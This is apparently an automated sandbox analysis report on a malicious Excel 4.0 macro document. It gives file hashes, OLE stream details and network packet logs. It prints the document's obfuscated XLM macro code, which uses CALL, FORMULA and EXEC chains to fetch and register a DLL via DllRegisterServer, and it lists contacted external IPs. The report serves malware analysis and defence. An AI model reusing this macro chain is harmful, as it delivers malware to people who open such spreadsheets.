                                                                                                                                                                                                          Preview: L..................F........N....-.......G.......G...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R. ....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R. .....S........................h.a.r.d.z.....~.1......R. ..Desktop.h.......Ny..R. .....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......841675...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):137
                                                                                                                                                                                                          Entropy (8bit):4.585950507926551
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:oyBVomMNHO+GUwSLMd1FC+GUwSLMd1mMNHO+GUwSLMd1v:dj6N5hNoVhNaN5hNS
                                                                                                                                                                                                          MD5:98402A16EDF52361A6CFC011A483D037
                                                                                                                                                                                                          SHA1:F9B9A03F60E6414C016F6802FBF2C14DF0CD0677
                                                                                                                                                                                                          SHA-256:012DD9A3C6E202F765F522AE35FA8F5DF2D0338115CCEB3B140D6DAD0B468A39
                                                                                                                                                                                                          SHA-512:D4686845967B74F738D8E17F865E848205AE8A873698531C221674EB69168EB34485C62D8E8301C642D210B29E8FCE7E7A16D341591E786BC09A44D3AE6D7FBB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..0b31c0f0_by_Libranalysis.xls.LNK=0..0b31c0f0_by_Libranalysis.xls.LNK=0..[xls]..0b31c0f0_by_Libranalysis.xls.LNK=0..
                                                                                                                                                                                                          C:\Users\user\Desktop\E7A10000
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):228873
                                                                                                                                                                                                          Entropy (8bit):5.6165533185237795
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:I7NiRdSD8YNoTU90u/fzn3b50X7vrPlsrXvLlL7Lz7Nium:JRdTrTU9ZZoum
                                                                                                                                                                                                          MD5:DA787CA8F3C20BAF59614BEDD354EE47
                                                                                                                                                                                                          SHA1:1E54849E2F672E4183D6FE16B4E3CFC61772FB08
                                                                                                                                                                                                          SHA-256:FB5A7982CF0ECA1205C3487D03DD4CC72F405C606A060C6684BBE2504785799A
                                                                                                                                                                                                          SHA-512:A845C9785C8A5790325A7A0E8726088E4E3EEF0F44BB1C424EA091D8D598A6810663501FE7FA4E9C8E14E5F22A37010C81E1C1782B7C9C4F2A46A9286675F939
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                                                          Entropy (8bit):3.258986427712615
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                          File name:0b31c0f0_by_Libranalysis.xls
                                                                                                                                                                                                          File size:375808
                                                                                                                                                                                                          MD5:0b31c0f0844b5541f94f915757c4ba61
                                                                                                                                                                                                          SHA1:4be1acd410a4e696278657309cd4de7874055991
                                                                                                                                                                                                          SHA256:d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
                                                                                                                                                                                                          SHA512:ec81f13553214ec8706748c94d51b20db51ae1d01981370b395f8f651173bc8136264d818ff1eb659a6d7fcbf954d4c58be331380694cf898d796dceb618e269
                                                                                                                                                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcN:vUGAt6Uqa5DPdG9uS9QLp4l+s+Y8
                                                                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Document Type:OLE
                                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                                          OLE File "0b31c0f0_by_Libranalysis.xls"

                                                                                                                                                                                                          Indicators

                                                                                                                                                                                                          Has Summary Info:True
                                                                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                                                                          Encrypted Document:False
                                                                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                                                                          Summary

                                                                                                                                                                                                          Code Page:1251
                                                                                                                                                                                                          Author:van-van
                                                                                                                                                                                                          Last Saved By:vi-vi
                                                                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                                                                          Security:0

                                                                                                                                                                                                          Document Summary

                                                                                                                                                                                                          Document Code Page:1251
                                                                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                                                                          Contains Dirty Links:False

                                                                                                                                                                                                          Streams

                                                                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                          General
                                                                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                                          Entropy:0.287037498961
                                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                          General
                                                                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                                          Entropy:0.290777742057
                                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                                                          General
                                                                                                                                                                                                          Stream Path:Book
                                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                                          Stream Size:363283
                                                                                                                                                                                                          Entropy:3.24522262131
                                                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                                                          
                                                                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          May 12, 2021 21:00:51.704725981 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:51.862798929 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:51.862938881 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:51.868599892 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.026566982 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.031371117 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.031429052 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.031461954 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.031481028 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.031518936 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.045068979 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.243745089 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.249886990 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.250056028 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.250835896 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.408812046 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.592989922 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.593342066 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.593359947 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.593950987 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.594039917 CEST49707443192.168.2.3192.185.39.58
                                                                                                                                                                                                          May 12, 2021 21:00:52.662770033 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:52.752285957 CEST44349707192.185.39.58192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.824639082 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.824757099 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:52.825683117 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:52.989253998 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.993160009 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.993187904 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.993200064 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.993283987 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:52.993336916 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:53.001960039 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:53.166119099 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:53.166254997 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:53.167197943 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:53.370682001 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:53.731242895 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:53.731358051 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:00:53.731591940 CEST44349709192.185.32.232192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:53.731652975 CEST49709443192.168.2.3192.185.32.232
                                                                                                                                                                                                          May 12, 2021 21:01:23.731844902 CEST44349709192.185.32.232192.168.2.3

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          May 12, 2021 21:00:31.480206966 CEST53609858.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:32.848531008 CEST5020053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:32.897247076 CEST53502008.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:35.591878891 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:35.671561956 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:36.128264904 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:36.194346905 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:37.045583010 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:37.097109079 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:38.028728008 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:38.077552080 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:38.649688959 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:38.710047007 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:39.630774975 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:39.682400942 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:45.330672979 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:45.382438898 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:46.718193054 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:46.806058884 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:47.228271961 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:47.298574924 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:47.427763939 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:47.479362965 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:48.244836092 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:48.302170038 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:49.293512106 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:49.342400074 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:51.355104923 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:51.426564932 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:51.643449068 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:51.702374935 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:51.816216946 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:51.867808104 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:52.611515999 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:52.660383940 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:53.630944014 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:53.682490110 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:55.417104006 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:55.475045919 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:00:59.242156982 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:00:59.291069031 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:00.428848982 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:00.477855921 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:01.613133907 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:01.663407087 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:02.779558897 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:02.836652040 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:03.683073997 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:03.732348919 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:04.670989990 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:04.719727993 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:05.833053112 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:05.847727060 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                          May 12, 2021 21:01:05.896573067 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:05.919400930 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                          May 12, 2021 21:01:07.009114981 CEST5054053192.168.2.38.8.8.8
